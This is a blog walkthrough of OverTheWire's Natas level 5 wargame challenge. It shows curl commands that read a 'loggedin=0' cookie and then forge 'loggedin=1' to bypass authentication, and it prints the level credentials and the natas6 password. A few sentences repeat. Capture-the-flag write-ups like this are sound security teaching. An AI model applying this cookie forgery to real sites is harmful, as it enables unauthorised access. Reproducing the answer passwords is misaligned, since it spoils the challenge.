| << Previous challenge |
Recommended reading:
- HTTP Cookies (Wikipedia version)
- grep (basic stuff only)
From the credentials discovered from the previous challenge, head up to http://natas5.natas.labs.overthewire.org and take a look at its content. You can also look at the source code, but it won't help much:
Access disallowed. You are not logged in
This challenge is about cookies. Cookies take a good part in exploitation and you should always, at some point, look at the cookies being set by the server, as they can help you a lot.
This time we're going to use curl with grep to see what cookies are being set (you can also just use your browser developer mode):
the -I flag tells curl to make a HEAD request, which only returns the headers. We then pipe it to grep and search for "Set-Cookie:", the header that sets cookies, and this is what we get:
So apparently the server sets a cookie named loggedin=0. I guess it's not hard to guess what we want to do next, which is to set that cookie to 1. In order to do this, we just run this command:
And this is what we get:
We're greeted with the password for natas6 in line 14.This time we're going to use curl with grep to see what cookies are being set (you can also just use your browser developer mode):
curl -I http://natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq@natas5.natas.labs.overthewire.org/ | grep "Set-Cookie:"
% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 Set-Cookie: loggedin=0
curl --cookie loggedin=1 http://natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq@natas5.natas.labs.overthewire.org/
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | <html> <head> <!-- This stuff in the header has nothing to do with the level --> <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css"> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" /> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" /> <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script> <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script> <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script> <script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head> <body> <h1>natas5</h1> <div id="content"> Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</div> </body> </html> |
| User | natas6 |
| Password | aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 |
Pretty simple challenge, just so people get familiar with cookies and their usage.
Never Settle,
| << Previous challenge |
No comments:
Post a Comment